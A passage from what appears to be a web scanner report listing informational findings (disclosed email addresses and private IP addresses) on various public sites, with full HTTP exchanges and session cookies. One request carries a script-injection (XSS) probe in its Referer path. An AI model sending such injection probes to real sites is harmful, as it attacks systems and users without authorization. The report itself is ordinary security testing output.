<meta name="description" content="Hotspot & Wireless LAN internet provider, WISP/WiMAX/Hotspot/Wifi Software pr
...[SNIP]...
<META NAME="Author" CONTENT="info@spotngo.ca">
...[SNIP]...
<A href="mailto:info@spotngo.ca?subject=Information Request">
info@spotngo.ca</A>
...[SNIP]...

20.89. http://www.spotngo.ca/services.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spotngo.ca
Path:   /services.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /services.htm HTTP/1.1
Host: www.spotngo.ca
Proxy-Connection: keep-alive
Referer: http://www.spotngo.ca/spotngonav.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=250201924.1704081487.1316220470.1316220470.1316220470.1; __utmb=250201924; __utmc=250201924; __utmz=250201924.1316220470.1.1.utmccn=(referral)|utmcsr=radius-server.net|utmcct=/aradial-radius-server-billing-partners-inner.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:23 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 06 Nov 2009 23:01:10 GMT
ETag: "1199008a-40e6-477bbd1d79980"
Accept-Ranges: bytes
Content-Length: 16614
Content-Type: text/html

<HTML>
<HEAD>
<META http-equiv="Content-Language" content="en-us">
<TITLE>Spotngo Hotspot Services</TITLE>
<meta name="description" content="Hotspot & Wireless LAN internet provider, WISP/WiMAX/Hots
...[SNIP]...
<META NAME="Author" CONTENT="info@spotngo.ca">
...[SNIP]...

20.90. http://www.ted.com/css/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /css/global.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/global.css?1316119359 HTTP/1.1
Host: www.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: symfony=6rh1uq799n643l7plr6irjcis1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:12 GMT
Content-Type: text/css
Last-Modified: Thu, 15 Sep 2011 20:42:00 GMT
Connection: keep-alive
Expires: Sun, 16 Oct 2011 19:54:12 GMT
Cache-Control: max-age=2592000
Content-Length: 34956

/*------------------------------------------------------------------
TED / global.css

Author: Christopher Berry <chris@form-studios.com>

1. CSS FILES ORGANISATION
   global.css -> global rules
   hom
...[SNIP]...

20.91. http://www.teranews.com/faq.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teranews.com
Path:   /faq.html

Issue detail

The following email address was disclosed in the response:

Request

GET /faq.html HTTP/1.1
Host: www.teranews.com
Proxy-Connection: keep-alive
Referer: http://www.teranews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:59 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 03:37:17 GMT
ETag: "3050021-3129-ba269540"
Accept-Ranges: bytes
Content-Length: 12585
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META name="GENERATOR" content="IBM WebSphere Homepage Builder V5.0.1 for Windows">
<TITLE>Tera News - Common Questions</TI
...[SNIP]...
</HTML>

*** File '(Unnamed)'
support@nibble.net
support@nibble.net
support@nibble.net
"admin"

*** File '(Unnamed)'
teranews
bubba
only
ultra
@teranews
7602
yotta
cpoint
create_account
email

*** File '(Unnamed)'
free.html
free.html
free.html
free.html
free.html
free.html
index.html
in
...[SNIP]...

20.92. https://www.thundernews.com/common/js/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thundernews.com
Path:   /common/js/common.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /common/js/common.js HTTP/1.1
Host: www.thundernews.com
Connection: keep-alive
Referer: https://www.thundernews.com/billinginfo.php?currency=USD&pricepointid=207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; ck_tn_user_country=-; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:36:55 GMT
Server: Apache
Last-Modified: Mon, 16 Nov 2009 10:45:37 GMT
ETag: "d4093b-4ab5-b5b93640"
Accept-Ranges: bytes
Content-Length: 19125
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: application/x-javascript

/*
   Copy Rights 2001 - 2003
   ITexchange

   _____________________________________________CODE META DATA STARTS

   Started On                : 15-AUG-2001
       
   Designed and Coded by    : Ramesh Beeraka (Software
...[SNIP]...
.charAt(Element.value.length-1) == '.')
           Flag = 0;
           
       if(Flag != 1)
       {
           if( isBlank(errmsg, 1) )
               errmsg = "Invalid Email Address.\nValid Characters [a-z][A-Z][0-9][ _ @ . - ].\n\ne.g newsguru@aol.com, gregy1981@msn.co.uk etc.";

           alert(errmsg);

           Element.focus();
           return 0;
       }    
       else
           return 1;
   }
   
   /* Duplicate Email Validation with out alert */
   function EmailValidation1(Element, errmsg)
   {

...[SNIP]...

20.93. http://www.usenetserver.com/en/support.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usenetserver.com
Path:   /en/support.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/support.php HTTP/1.1
Host: www.usenetserver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:36:29 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Fri, 23 Sep 2011 19:36:29 GMT
Content-Type: text/html
Content-Length: 21338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- BEGIN Google Website
...[SNIP]...
<a href="mailto:support@usenetserver.com">support@usenetserver.com</a>
...[SNIP]...

20.94. http://www.vm.ibm.com/search/search.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vm.ibm.com
Path:   /search/search.cgi

Issue detail

The following email address was disclosed in the response:

Request

GET /search/search.cgi?WORDS=xss&HOW=AND&FILTER= HTTP/1.1
Host: www.vm.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/

Response

HTTP/1.0 200 OK
Server: z/Web-server_for_VM+SSL/1.6a z_VM/5.4.0.1101 CMS/24.003 REXX/4.02 CMS_Pipelines/1.0110
MIME-Version: 1.0
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ZZ" lang="en-ZZ">
<h
...[SNIP]...
<META NAME="contact" CONTENT="bkw@vnet.ibm.com">
...[SNIP]...

20.95. http://www.westhost.com/js/jquery.hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.hoverIntent.js HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://www.westhost.com/images7b72b%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E701445012d5/bluegradbg.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=472ac3b6e7c48c22718ae5d91710e815

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:40:57 GMT
Server: Apache/2.0.52 (Red Hat)
ETag: "1588b14-11a8-79736540"
Accept-Ranges: bytes
Content-Length: 4520
Cache-Control: max-age=2628000, public
Content-Type: application/x-javascript

/**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down (b
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21. Private IP addresses disclosed  previous  next
There are 81 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


21.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/l/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&t=&l=Share
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 16 Sep 2011 17:57:08 -0700
Pragma:
X-FB-Rev: 442386
X-FB-Server: 10.42.14.47
X-Cnection: close
Date: Sat, 17 Sep 2011 00:55:08 GMT
Content-Length: 316

fb_sharepro_render([{"url":"http:\/\/omg.yahoo.com\/photos\/what-were-they-thinking\/5203","normalized_url":"http:\/\/omg.yahoo.com\/photos\/what-were-they-thinking\/5203","share_count":143,"like_coun
...[SNIP]...

21.2. http://beta.abc.go.com/shows/charlies-angels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /shows/charlies-angels HTTP/1.1
Host: beta.abc.go.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1249573/CA_300x600.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:01 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 28315
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/sche
...[SNIP]...
<![CDATA[
   s_omni.pageName    = 'abccom:primetime:charlies-angels:index';
   s_omni.pageType    = '';
   s_omni.server    = '10.254.203.196';
   s_omni.channel    = 'abccom:primetime';
   s_omni.prop1    = 'abccom';
   s_omni.prop5    = 'abccom:primetime:charlies-angels';
   s_omni.prop6    = 'abccom:primetime:charlies-angels:index';
   s_omni.prop14    = 'abccom
...[SNIP]...

21.3. http://beta.abc.go.com/shows/charlies-angels/bios  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels/bios

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /shows/charlies-angels/bios HTTP/1.1
Host: beta.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; main=main5; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240959985%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bbios%255Eabccom%253Aprimetime%253Acharlies-angels%253Aindex%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:05:43 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 28574
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/sche
...[SNIP]...
<![CDATA[
   s_omni.pageName    = 'abccom:primetime:charlies-angels:bios';
   s_omni.pageType    = '';
   s_omni.server    = '10.254.203.196';
   s_omni.channel    = 'abccom:primetime';
   s_omni.prop1    = 'abccom';
   s_omni.prop5    = 'abccom:primetime:charlies-angels';
   s_omni.prop6    = 'abccom:primetime:charlies-angels:bios';
   s_omni.prop14    = 'abccom:
...[SNIP]...

21.4. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels/bios/eve-french

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /shows/charlies-angels/bios/eve-french HTTP/1.1
Host: beta.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; main=main5; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 25940
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/sche
...[SNIP]...
<![CDATA[
   s_omni.pageName    = 'abccom:primetime:charlies-angels:bios:eve-french';
   s_omni.pageType    = '';
   s_omni.server    = '10.64.9.183';
   s_omni.channel    = 'abccom:primetime';
   s_omni.prop1    = 'abccom';
   s_omni.prop5    = 'abccom:primetime:charlies-angels';
   s_omni.prop6    = 'abccom:primetime:charlies-angels:bios';
   s_omni.prop14    = 'abccom:
...[SNIP]...

21.5. http://cdnbakmi.kaltura.com/html5/html5lib/org/mwEmbedLoader.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnbakmi.kaltura.com
Path:   /html5/html5lib/org/mwEmbedLoader.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html5/html5lib/org/mwEmbedLoader.php HTTP/1.1
Host: cdnbakmi.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 17 Sep 2011 00:51:16GMT
Vary: Accept-Encoding
X-Me: pa-apache6
Content-Type: text/javascript
Content-Length: 32999
Cache-Control: private, max-age=21
Expires: Sat, 17 Sep 2011 00:52:17 GMT
Date: Sat, 17 Sep 2011 00:51:56 GMT
Connection: close

KALTURA_SCRIPT_NAME = "/html5/html5lib/org/mwEmbedLoader.php";
/*@cc_on@if(@_jscript_version<9){'video audio source track'.replace(/\w+/g,function(n){document.createElement(n)})}@end@*/
/**
* Kaltu
...[SNIP]...
b/mwEmbed/ResourceLoader.php';
var SCRIPT_FORCE_DEBUG = false;
var FORCE_LOAD_JQUERY = false;

// These Lines are for local testing:
// SCRIPT_FORCE_DEBUG = true;
// SCRIPT_LOADER_URL = 'http://192.168.1.69/html5.kaltura/mwEmbed/ResourceLoader.php';

if( typeof console != 'undefined' && console.log ) {
   console.log( 'Kaltura MwEmbed Loader Version: ' + KALTURA_LOADER_VERSION );
}

// Define mw ( if
...[SNIP]...

21.6. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAl2xmjj0Yt6CB5&url=http%3A%2F%2Fsecure-us.imrworldwide.com%2Fcgi-bin%2Fm%3Fci%3Dus-504159h%26cg%3D0%26cc%3D1%26ts%3Dnoscript HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.62.184.38
X-Cnection: close
Content-Length: 43
Cache-Control: public, max-age=86400
Expires: Sun, 18 Sep 2011 00:57:28 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

GIF89a.............!.......,...........D..;

21.7. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQDfn3slQlNOcEn5&url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FWIP_431_WIP431_episode_d3fa1fd6-e452-4c7d-8d33-bf0895742919_3919534_220x124.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.126.37
X-Cnection: close
Content-Length: 7885
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Expires: Sat, 17 Sep 2011 01:57:28 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.8. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQA5uF2gxEfcGWgP&url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FVIEW_20110916_View20110916_episode_79701fd4-78d0-4966-a9b3-41dbaa8a0d97_3928448_220x124.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.74.73
X-Cnection: close
Content-Length: 9027
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Expires: Sat, 17 Sep 2011 01:57:28 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.9. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCV33-OCrCuwHpc&url=http%3A%2F%2Fa.abcnews.go.com%2Fimages%2F2020%2Fabc_2020_sept11_full_110911_220x124.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.34.35
X-Cnection: close
Content-Length: 7792
Vary: Accept-Encoding
Cache-Control: public, max-age=295
Expires: Sat, 17 Sep 2011 01:02:23 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.10. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCD55NzrFBv39X8&url=http%3A%2F%2Fcdn.video.abc.com%2Fvideo%2Fthumbnails%2F117x66%2FJKLC_20110913_StaindNotAgain_Concert_HD720p_37b22ebc-17fe-40cb-bfab-3899c2608deb_3921101.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.153.46
X-Cnection: close
Content-Length: 3125
